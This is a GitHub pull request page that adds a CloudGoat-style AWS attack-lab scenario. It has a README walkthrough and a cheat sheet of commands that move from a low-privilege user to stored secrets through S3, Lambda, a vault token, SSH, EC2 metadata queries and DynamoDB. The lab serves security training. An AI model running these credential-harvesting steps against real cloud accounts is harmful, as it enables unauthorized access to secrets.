Secrets in the cloud #189
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| # Scenario: secrets_in_the_cloud | ||
|
|
||
| **Size:** Large | ||
|
|
||
| **Difficulty:** Hard | ||
|
|
||
| **Command:** `$ ./cloudgoat.py create secrets_in_the_cloud` | ||
|
|
||
| ## Resources | ||
|
|
||
| * 1 Lambda | ||
| * 1 EC2 | ||
| * 1 S3 | ||
| * 1 DynamoDB | ||
| * 1 Secrets Manager Secret | ||
| * 2 IAM Users | ||
|
|
||
| ## Start | ||
|
|
||
| 1. IAM User: low-priv-user | ||
|
|
||
| ## Goal | ||
|
|
||
| Find the final secret in Secrets Manager. | ||
|
|
||
| ## Summary | ||
|
|
||
| As an IAM user with limited privileges, the attacker initiates their journey by examining AWS resources to uncover clues and hidden information. This investigation ultimately results in acquiring a role that grants access to the scenario's primary objective: retrieving the final secret from Secrets Manager. Please note that this walkthrough outlines the intended path for completing the scenario. However, alternative approaches may exist, and we would be delighted to learn about any unique methods used to reach the finish line. | ||
|
|
||
| ## Path | ||
|
|
||
|  | ||
|
|
||
| ## Walkthrough | ||
|
|
||
| 1. As the IAM user "low-priv-user", the attacker explores the AWS environment, discovering an S3 bucket containing the URL to a web application hosted on an EC2 instance. | ||
| 2. The attacker enumerates the web application and uncovers an admin page that prompts for an API key. | ||
| 3. While examining the admin page's HTML comments, the attacker finds information about environment variables and a HashiCorp endpoint. | ||
| 4. By enumerating the scenario's Lambda function, the attacker locates the web application's API key and uses it to obtain the HashiCorp vault token. | ||
| 5. The attacker exploits the vault token to log in to the HashiCorp endpoint and acquires the id_rsa key, which grants SSH access to the EC2 instance hosting the web application. | ||
|
There was a problem hiding this comment. Can you add the link to where the user will need to download the vault command to the cheat sheet? https://developer.hashicorp.com/vault/downloads There was a problem hiding this comment. Downloading this tool might be tricky for Docker-only users (aka me). I'll look into how to get around it and add the steps here. There was a problem hiding this comment. I had to download and mount into the docker container this zip file (https://releases.hashicorp.com/vault/1.13.2/vault_1.13.2_linux_amd64.zip). I would add it as a note for docker-users. |
||
| 6. Intrigued by the login message, the attacker queries the EC2 metadata service and discovers that IMDSv2 is in use. | ||
|
There was a problem hiding this comment. Can you add the commands needed to perform these steps in the cheat sheet? There was a problem hiding this comment. I think we decided to skip this one There was a problem hiding this comment. I made some changes to the README walk through and the cheat sheet so they're more descriptive. |
||
| 7. The attacker queries the EC2 metadata service again, using a token in the header of the request to successfully obtain a response. | ||
| 8. After enumerating the EC2 metadata service, the attacker decides to list available DynamoDB tables and discovers a table containing IAM user credentials specific to the scenario. | ||
| 9. Utilizing the newly acquired IAM user credentials, the attacker retrieves the final secret from the Secrets Manager, successfully completing the scenario. | ||
|
|
||
| A cheat sheet for the scenario is available [here](./cheat_sheet.md). | ||
|
There was a problem hiding this comment. yea, that's super weird. Might be related to terminal or some random key press I did. It can be deleted. There was a problem hiding this comment. this should be fixed now. |
||
|
|
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| ``` | ||
| export AWS_ACCESS_KEY_ID=[low-priv-user] | ||
| export AWS_SECRET_ACCESS_KEY=[low-priv-user] | ||
| ``` | ||
|
|
||
| `aws s3 ls` | ||
|
|
||
| `aws s3 ls s3://[bucket]` | ||
|
|
||
| `aws s3 cp s3://[bucket]/nates_web_app_url.txt .` | ||
|
|
||
| `cat nates_web_app_url.txt` | ||
|
|
||
| `aws lambda list-functions` | ||
|
|
||
| `export VAULT_ADDR='http://[ip]:8200'` | ||
|
|
||
| `vault login TorysTotallyTubular456` | ||
|
|
||
| `vault kv get secret/id_rsa` | ||
|
|
||
| `echo "[id_rsa]" >> id_rsa` | ||
|
|
||
| `chmod 400 id_rsa` | ||
|
|
||
| `ssh -i id_rsa ec2-user@[ip]` | ||
|
|
||
| `TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")` | ||
|
|
||
| `curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/info` | ||
|
|
||
| `aws dynamodb list-tables` | ||
|
|
||
| `aws dynamodb scan --table-name [table]` | ||
|
|
||
| ``` | ||
| export AWS_ACCESS_KEY_ID=[secrets-manager-user] | ||
| export AWS_SECRET_ACCESS_KEY=[secrets-manager-user] | ||
| ``` | ||
|
|
||
| `aws secretsmanager list-secrets` | ||
|
|
||
| `aws secretsmanager get-secret-value --secret-id [secret]` |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
After starting the scenario and using the cheat sheet, I'm unable to identify the HashiCorp endpoint. Can you add the steps need to identify the HashiCorp endpoint?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
updated step 3 to clarify the port number and location of the endpoint.